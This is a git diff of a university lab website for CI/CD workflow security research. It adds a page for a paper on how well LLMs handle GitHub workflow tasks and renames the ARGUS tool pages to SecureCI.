+ LLM4GW is the first comprehensive study to assess how effective Large Language Models (LLMs) are for tasks related to GitHub workflows. While LLMs have shown effectiveness in software development tasks like coding and testing, GitHub workflows are distinct from regular code in terms of structure, semantics, and security properties.
+
+
+ We curated a dataset of around 400,000 workflows based on ARGUS dataset, generated prompts with varying levels of detail, and fine-tuned three state-of-the-art LLMs: GPT-3.5, CodeLlama, and StarChat. We evaluated the performance of these LLMs, both off-the-shelf and fine-tuned, on five workflow-related tasks: workflow generation, defect detection (syntactic errors and code injection vulnerabilities), and defect repair. The evaluation encompassed different prompting modes (zero-shot, one-shot) and involved identifying the best-performing temperature value and prompt for each LLM and task.
+
+
+ The study revealed that, unlike regular code generation, LLMs require detailed prompts to generate the desired workflows, but these detailed prompts can lead to invalid workflows with syntactic errors. Additionally, the LLMs were found to produce workflows with code injection vulnerabilities. The research also highlights the need for novel LLM-assisted techniques, as the current LLMs were found to be ineffective at repairing workflow defects.
+
+ Our code is opensourced on GitHub. Please check out the repository for more details.
+
+
Bibtex
+
+ @inproceedings{10.1145/3664476.3664497,
+ author = {Zhang, Xinyu and Muralee, Siddharth and Cherupattamoolayil, Sourag and Machiry, Aravind},
+ title = {On the Effectiveness of Large Language Models for GitHub Workflows},
+ year = {2024},
+ isbn = {9798400717185},
+ publisher = {Association for Computing Machinery},
+ address = {New York, NY, USA},
+ url = {https://doi.org/10.1145/3664476.3664497},
+ doi = {10.1145/3664476.3664497},
+ booktitle = {Proceedings of the 19th International Conference on Availability, Reliability and Security},
+ articleno = {32},
+ numpages = {14},
+ location = {Vienna, Austria},
+ series = {ARES '24}
+ }
+
+
+
+
+
+
+
+
+
+
+ LLM4GW | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+
GitHub published a blog post about our findings and also mentioned our tool. We are grateful for the support provided by them throughout our research.
+
Our tool is opensourced on GitHub. Please check out the repository for more details.
+
PoCs
+
+ We have developed PoCs for some randomly picked vulnerable workflows. The PoCs are currently restricted to induviduals who's identities we can verfiy, to prevent any misuse. If you are interested in obtaining the PoCs, please follow the steps mentioned here. You can select the PoC option while filling the form.
+
- We are delighted to share the ARGUS dataset and believe it will be a valuable resource for your research. However, to prevent any potential misuse, we kindly request that you fill out a request form to confirm your identity and outline the scope of your research. Once we have verified these details, we will provide you with the download link for the ARGUS dataset.
+ We are delighted to share our datasets and believe they will be valuable resources for your research. However, to prevent any potential misuse, we kindly request that you fill out a request form to confirm your identity and outline the scope of your research. Once we have verified these details, we will provide you with the download link for the datasets.
- To download the ARGUS dataset, you must agree with the items of the succeeding Disclaimer & Download Agreement. You should carefully read the following terms before submitting the ARGUS Dataset request form.
+ To download our datasets, you must agree with the items of the succeeding Disclaimer & Download Agreement. You should carefully read the following terms before submitting the Dataset Request Form.
ARGUS Dataset is constructed and cross-checked by 2 experts that work in workflow security research. Due to the potential misclassification led by subjective factors, our members cannot guarantee a 100% accuracy for samples in the dataset.
@@ -97,12 +98,12 @@
Disclaimer & Download Agreement
The purpose of using the dataset should be non-commercial research and/or personal use. The dataset should not be used for commercial use and any profitable purpose.
-
The ARGUS dataset should not be re-selled or re-distributed. Anyone who has obtained ARGUS should not share the dataset with others without the permission from our team.
+
The dataset should not be re-selled or re-distributed. Anyone who has obtained the dataset should not share the dataset with others without the permission from our team.
-
+
@@ -145,7 +146,7 @@
Dataset Shared With
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
diff --git a/file/LLM4GW.bib b/file/LLM4GW.bib
new file mode 100644
index 0000000..4bf927b
--- /dev/null
+++ b/file/LLM4GW.bib
@@ -0,0 +1,15 @@
+@inproceedings{10.1145/3664476.3664497,
+ author = {Zhang, Xinyu and Muralee, Siddharth and Cherupattamoolayil, Sourag and Machiry, Aravind},
+ title = {On the Effectiveness of Large Language Models for GitHub Workflows},
+ year = {2024},
+ isbn = {9798400717185},
+ publisher = {Association for Computing Machinery},
+ address = {New York, NY, USA},
+ url = {https://doi.org/10.1145/3664476.3664497},
+ doi = {10.1145/3664476.3664497},
+ booktitle = {Proceedings of the 19th International Conference on Availability, Reliability and Security},
+ articleno = {32},
+ numpages = {14},
+ location = {Vienna, Austria},
+ series = {ARES '24}
+}
\ No newline at end of file
diff --git a/img/githublogo.png b/img/githublogo.png
new file mode 100644
index 0000000..a8376fa
Binary files /dev/null and b/img/githublogo.png differ
diff --git a/index.html b/index.html
index a80f1bc..da3c5f4 100644
--- a/index.html
+++ b/index.html
@@ -36,49 +36,64 @@
-
-
-
-
ARGUS Overview
-
-
- ARGUS is a groundbreaking static taint analysis system specifically designed to identify code injection vulnerabilities in GitHub Actions. It is the first of its kind, offering a unique approach to securing Continuous Integration/Continuous Deployment (CI/CD) pipelines.
-
-
- The system operates by tracking the flow of untrusted data across workflows and their associated actions, thereby identifying potential vulnerabilities. ARGUS has been meticulously tested on a large scale, analyzing over 2.7 million workflows and more than 31,000 actions. The results of this evaluation revealed critical code injection vulnerabilities in thousands of workflows and actions, highlighting the pervasive nature of such vulnerabilities in the GitHub Actions ecosystem.
-
-
- ARGUS not only outperforms existing pattern-based vulnerability scanners but also underscores the necessity of taint analysis for effective vulnerability detection. The development and implementation of ARGUS represent a significant stride towards enhancing the security of GitHub Actions and CI/CD pipelines at large.
-
-
-
Github's Blog
-
- GitHub published a blog post about our findings and also mentioned our tool. We are grateful for the support provided by them throughout our research.
-
-
Code
-
- Our tool is opensourced on GitHub. Please check out the repository for more details.
-
-
Bibtex
-
- @inproceedings{muralee2023Argus,
- title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
- author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
- A. Kapravelos, A. Machiry},
- booktitle={32st USENIX Security Symposium (USENIX Security 23)},
- year={2023},
- }
-
-
-
-
-
-
+
+
+
+
Overview
+
+
+ Continuous Integration (CI) has become essential to the modern software development cycle. Developers engineer CI scripts, commonly called workflows or pipelines, to automate most software maintenance tasks, such as testing and deployment.
+
+
+ Developers frequently misconfigure workflows resulting in severe security issues, which can have devastating effects resulting in supply-chain attacks. The extreme diversity of CI platforms and the supported features further exacerbate the problem and make it challenging to specify and verify security properties across different CI platforms uniformly. In this area, we aim to addresses the problem by defining the desired security properties of a workflow and developing platform-independent techniques to verify and enforce the security properties.
+
+
+
+
+
+
+
+
+
Projects
+
+
+
+
+
ARGUS
+
+ ARGUS is a groundbreaking static taint analysis system specifically designed to identify code injection vulnerabilities in GitHub Actions. It is the first of its kind, offering a unique approach to securing Continuous Integration/Continuous Deployment (CI/CD) pipelines.
+
- We are greatful to the following sources for funding this project.
+ We are greatful to the following sources for funding the projects.
@@ -121,7 +136,7 @@
Funding
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
\ No newline at end of file
diff --git a/poc.html b/poc.html
index 790b943..292c7f1 100644
--- a/poc.html
+++ b/poc.html
@@ -63,7 +63,7 @@
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University